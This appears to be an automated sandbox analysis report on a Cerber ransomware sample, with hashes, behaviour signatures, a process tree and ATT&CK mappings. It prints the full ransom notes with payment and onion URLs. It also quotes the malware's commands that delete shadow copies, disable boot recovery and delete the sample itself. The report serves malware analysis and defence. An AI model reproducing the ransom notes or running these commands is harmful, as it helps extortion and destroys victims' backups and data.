Analysis

  • max time kernel
    151s
  • max time network
    168s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    10-05-2024 21:48

General

  • Target

    31318ee80570c7168708575f032ac63f_JaffaCakes118.exe

  • Size

    257KB

  • MD5

    31318ee80570c7168708575f032ac63f

  • SHA1

    82a8589abd62b469c4ec3c454434a75a63f8b2c6

  • SHA256

    849b68c42ca9935f63aea47b02a730b64d0dcb9897e589fee3f64175bc592d84

  • SHA512

    bd0e851945ad1b2fd726976e5f03f4fad934f598cb8d936c59922afeb8e2cb575dc1a20a008bede70db26f4d6a91eb73d822539c59da7f5975e4244bc65440bc

  • SSDEEP

    6144:ewHysO+dCW3EWXJ44UMa6ZhZoXtMQJCIEFTcdGwJ:VO+EW3TXiNMlSXOQJpAcIwJ

Malware Config

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.txt

Ransom Note
C_E_R_B_E_R R_A_N_S_O_M_W_A_R_E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable??? It is normal because the files' names, as well as the data in your files have been encrypted. Great! You have turned to be a part of a big community "#Cerb3r Ransomware". ######################################################################### !!! If you are reading this message it means the software "Cerber" has !!! been removed from your computer. !!! HTML instruction ("# DECRYPT MY FILES #.html") always contains a !!! working domain of your personal page! ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. 
It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to return your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374 | | 2. 
http://52uo5k3t73ypjije.8kcfnk.bid/AD10-4B65-57FA-005C-9374 | | 3. http://52uo5k3t73ypjije.csv7o6.bid/AD10-4B65-57FA-005C-9374 | | 4. http://52uo5k3t73ypjije.jal9lk.bid/AD10-4B65-57FA-005C-9374 | | 5. http://52uo5k3t73ypjije.onion.to/AD10-4B65-57FA-005C-9374 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374); 2. 
in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://52uo5k3t73ypjije.onion/AD10-4B65-57FA-005C-9374 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. 
If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.
URLs

http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.8kcfnk.bid/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.csv7o6.bid/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.jal9lk.bid/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.onion.to/AD10-4B65-57FA-005C-9374

http://52uo5k3t73ypjije.onion/AD10-4B65-57FA-005C-9374

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.html

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>&#067;erber &#082;ansomware</title> <style> a { color: #47c; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #333; font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; line-height: 1.6; margin: 0; padding: 0; } hr { background-color: #e7e7e7; border: 0 none; border-bottom: 1px solid #c7c7c7; height: 5px; margin: 30px 0; } li { padding: 0 0 7px 7px; } ol { padding-left: 3em; } .container { background-color: #fff; border: 1px solid #c7c7c7; margin: 40px; padding: 40px 40px 20px 40px; } .info, .tor { background-color: #efe; border: 1px solid #bda; display: block; padding: 0px 20px; } .logo { font-size: 12px; font-weight: bold; line-height: 1; margin: 0; } .upd_on { color: red; display: block; } .upd_off { display: none; float: left; } .tor { padding: 10px 0; text-align: center; } .url { margin-right: 5px; } .warning { background-color: #f5e7e7; border: 1px solid #ebccd1; color: #a44; display: block; padding: 15px 10px; text-align: center; } </style> </head> <body> <div class="container"> <h3>C E R B E R&nbsp;&nbsp;&nbsp;R A N S O M W A R E</h3> <hr> <p>Cannot you find the files you need?<br>Is the content of the files that you looked for not readable?</p> <p>It is normal because the files' names, as well as the data in your files have been encrypted.</p> <p>Great!<br>You have turned to be a part of a big community "#C3rber Ransomware".</p> <hr> <p><span class="warning">If you are reading this message it means the software "Cerber" has been removed from your computer.</span></p> <hr> <h3>What is encryption?</h3> <p>Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users.</p> <p>To become an authorized user and keep the modification absolutely reversible (in other words 
to have a possibility to decrypt your files) you should have an individual private key.</p> <p>But not only it.</p> <p>It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data.</p> <hr> <h3>Everything is clear for me but what should I do?</h3> <p>The first step is reading these instructions to the end.</p> <p>Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you.</p> <p>After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions.</p> <p>It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.</p> <p><span class="warning">!Any attempts to get back your files with the third-party tools can be fatal for your encrypted files!</span></p> <p>The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files.</p> <p>Finally it will be impossible to decrypt your files!</p> <p>When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly.</p> <p>You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files.</p> <hr> <p><span class="warning">There are several plain steps to restore your files but if you do not follow them we will not be able to help you, and we will not try since you have read this warning already.</span></p> <hr> <p>For your information the software to decrypt your files (as well as 
the private key provided together) are paid products.</p> <p>After purchase of the software package you will be able to:</p> <ol> <li>decrypt all your files;</li> <li>work with your documents;</li> <li>view your photos and other media;</li> <li>continue your usual and comfortable work at the computer.</li> </ol> <p>If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files.</p> <hr> <div class="info"> <p>There is a list of temporary addresses to go on your personal page below:</p> <ol> <li><span class="upd_off" id="upd_1">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374" id="url_1" target="_blank">http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374</a>(<a href="#updateUrl" onClick="return updateUrl();" style="color: red;">Get a NEW address!</a>)</li> <li><a href="http://52uo5k3t73ypjije.8kcfnk.bid/AD10-4B65-57FA-005C-9374" target="_blank">http://52uo5k3t73ypjije.8kcfnk.bid/AD10-4B65-57FA-005C-9374</a></li> <li><a href="http://52uo5k3t73ypjije.csv7o6.bid/AD10-4B65-57FA-005C-9374" target="_blank">http://52uo5k3t73ypjije.csv7o6.bid/AD10-4B65-57FA-005C-9374</a></li> <li><a href="http://52uo5k3t73ypjije.jal9lk.bid/AD10-4B65-57FA-005C-9374" target="_blank">http://52uo5k3t73ypjije.jal9lk.bid/AD10-4B65-57FA-005C-9374</a></li> <li><a href="http://52uo5k3t73ypjije.onion.to/AD10-4B65-57FA-005C-9374" target="_blank">http://52uo5k3t73ypjije.onion.to/AD10-4B65-57FA-005C-9374</a></li> </ol> </div> <hr> <h3>What should you do with these addresses?</h3> <p>If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it):</p> <ol> <li>take a look at the first address (in this case it is <span class="upd_off" id="upd_2">Please wait...</span><a class="url" 
href="http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374" id="url_2" target="_blank">http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374</a>);</li> <li>select it with the mouse cursor holding the left mouse button and moving the cursor to the right;</li> <li>release the left mouse button and press the right one;</li> <li>select "Copy" in the appeared menu;</li> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>move the mouse cursor to the address bar of the browser (this is the place where the site address is written);</li> <li>click the right mouse button in the field where the site address is written;</li> <li>select the button "Insert" in the appeared menu;</li> <li>then you will see the address <span class="upd_off" id="upd_3">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374" id="url_3" target="_blank">http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374</a> appeared there;</li> <li>press ENTER;</li> <li>the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling.</li> </ol> <p>If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions.</p> <p>If you browse the instructions in HTML format:</p> <ol> <li>click the left mouse button on the first address (in this case it is <span class="upd_off" id="upd_4">Please wait...</span><a class="url" href="http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374" id="url_4" target="_blank">http://52uo5k3t73ypjije.7156et.bid/AD10-4B65-57FA-005C-9374</a>);</li> <li>in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address.</li> 
</ol> <p>If for some reason the site cannot be opened check the connection to the Internet.</p> <hr> <p>Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products.</p> <p>Unlike them we are ready to help you always.</p> <p>If you need our help but the temporary sites are not available:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <span class="tor">http://52uo5k3t73ypjije.onion/AD10-4B65-57FA-005C-9374</span> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or operation of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=install+tor+browser+windows" target="_blank">https://www.youtube.com/</a> and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation.</p> <p>If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files.</p> <hr> <h3>Additional 
information:</h3> <p>You will find the instructions for restoring your files in those folders where you have your encrypted files only.</p> <p>The instructions are made in two file formats - HTML and TXT for your convenience.</p> <p>Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files.</p> <p>The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company.</p> <hr> <p>Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data.</p> <p>The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection.</p> <p>Together we make the Internet a better and safer place.</p> <hr> <p>If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support.</p> <hr> <p>Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.</p> </div> <script> function getXMLHttpRequest() { if (window.XMLHttpRequest) { return new window.XMLHttpRequest; } else { try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } } function getUrlContent(url, callback) { var xhttp = getXMLHttpRequest(); if (xhttp) { xhttp.onreadystatechange = function() { if (xhttp.readyState == 4) { if (xhttp.status == 200) { return callback(xhttp.responseText.replace(/[\s ]+/gm, ""), null); } else { return callback(null, true); } } }; xhttp.open("GET", url + '?_=' + new Date().getTime(), true); xhttp.send(); } else { return callback(null, true); } } function server1(address, callback) { 
getUrlContent("http://btc.blockr.io/api/v1/address/txs/" + address, function(result, error) { if (!error) { var tx = /"tx":"([\w]+)","time_utc":"[\w-:]+","confirmations":[\d]+,"amount":-/.exec(result); if (tx) { getUrlContent("http://btc.blockr.io/api/v1/tx/info/" + tx[1], function(result, error) { if (!error) { var address = /"vouts":\[{"address":"([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true); } }); } function server2(address, callback) { getUrlContent("http://api.blockcypher.com/v1/btc/main/addrs/" + address, function(result, error) { if (!error) { var tx = /"tx_hash":"([\w]+)","block_height":[\d]+,"tx_input_n":[\d-]+,"tx_output_n":-/.exec(result); if (tx) { getUrlContent("http://api.blockcypher.com/v1/btc/main/txs/" + tx[1], function(result, error) { if (!error) { var address = /"outputs":\[{"value":[\d]+,"script":"[\w]+","spent_by":"[\w]+","addresses":\["([\w]+)"/.exec(result); if (address) { return callback(address[1], null); } else { return callback(null, true); } } else { return callback(null, true); } }); } else { return callback(null, true); } } else { return callback(null, true);

Signatures

  • Cerber 2 IoCs

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • Modifies visibility of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Contacts a large number (514) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Control Panel 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe"
      2⤵
      • Cerber
      • Modifies visibility of hidden/system files in Explorer
      • Adds policy Run key to start application
      • Drops startup file
      • Loads dropped DLL
      • Adds Run key to start application
      • Modifies Control Panel
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe
        "C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe
          "C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe"
          4⤵
          • Cerber
          • Modifies visibility of hidden/system files in Explorer
          • Adds policy Run key to start application
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • Modifies Control Panel
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1200
          • C:\Windows\system32\vssadmin.exe
            "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2740
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2332
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2136
          • C:\Windows\System32\bcdedit.exe
            "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2824
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.html
            5⤵
            PID:2212
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2212 CREDAT:275457 /prefetch:2
              6⤵
              PID:2268
          • C:\Windows\system32\NOTEPAD.EXE
            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\# DECRYPT MY FILES #.txt
            5⤵
            PID:2688
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\# DECRYPT MY FILES #.vbs"
            5⤵
            PID:1560
          • C:\Windows\system32\cmd.exe
            /d /c taskkill /f /im "makecab.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe" > NUL
            5⤵
            PID:320
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im "makecab.exe"
              6⤵
              • Kills process with taskkill
              PID:1344
            • C:\Windows\system32\PING.EXE
              ping -n 1 127.0.0.1
              6⤵
              • Runs ping.exe
              PID:920
        • C:\Windows\SysWOW64\cmd.exe
          /d /c taskkill /f /im "31318ee80570c7168708575f032ac63f_JaffaCakes118.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\AppData\Local\Temp\31318ee80570c7168708575f032ac63f_JaffaCakes118.exe" > NUL
          3⤵
          • Deletes itself
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im "31318ee80570c7168708575f032ac63f_JaffaCakes118.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1068
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 1 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:1912
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:772
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    PID:2976
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2976 CREDAT:275457 /prefetch:2
      2⤵
      PID:216
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
    1⤵
    PID:2408
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x52c
    1⤵
    PID:1952

                    Network

                    MITRE ATT&CK Matrix ATT&CK v13

                    Tactic, then technique (ATT&CK ID): number of matching signatures

                    Execution
                      • Windows Management Instrumentation (T1047): 1

                    Persistence
                      • Boot or Logon Autostart Execution (T1547): 2
                        • Registry Run Keys / Startup Folder (T1547.001): 2

                    Privilege Escalation
                      • Boot or Logon Autostart Execution (T1547): 2
                        • Registry Run Keys / Startup Folder (T1547.001): 2

                    Defense Evasion
                      • Hide Artifacts (T1564): 1
                        • Hidden Files and Directories (T1564.001): 1
                      • Modify Registry (T1112): 4
                      • Indicator Removal (T1070): 2
                        • File Deletion (T1070.004): 2

                    Credential Access
                      • Unsecured Credentials (T1552): 1
                        • Credentials In Files (T1552.001): 1

                    Discovery
                      • Network Service Discovery (T1046): 1
                      • System Information Discovery (T1082): 2
                      • Remote System Discovery (T1018): 1

                    Collection
                      • Data from Local System (T1005): 1

                    Impact
                      • Inhibit System Recovery (T1490): 3
                      • Defacement (T1491): 1


                    Downloads

                    • C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.html (19KB)
                    • C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.txt (10KB)
                    • C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.url (90B)
                    • C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# DECRYPT MY FILES #.vbs (252B)
                    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6F744CE1-0F17-11EF-9960-CAFA5A0A62FD}.dat (5KB)
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\json[1].json (297B)
                    • C:\Users\Admin\AppData\Roaming\403-3.htm (1KB)
                    • C:\Users\Admin\AppData\Roaming\ChiPollywog.9mW (79KB)
                    • C:\Users\Admin\AppData\Roaming\HelpButton.dll (no size recorded; the recorded hashes are those of an empty file)
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\makecab.lnk (1KB)
                    • C:\Users\Admin\AppData\Roaming\Phenothiazine.aLp (4KB)
                    • C:\Users\Admin\AppData\Roaming\eclipse.plugin.provider.xml (1KB)
                    • C:\Users\Admin\AppData\Roaming\eclipse.plugin.provider.xml (914B)
                    • \Users\Admin\AppData\Local\Temp\nsjD902.tmp\System.dll (11KB)
                    • \Users\Admin\AppData\Roaming\HelpButton.dll (68KB)
                    • \Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe (257KB; its recorded hashes are identical to those of the submitted sample)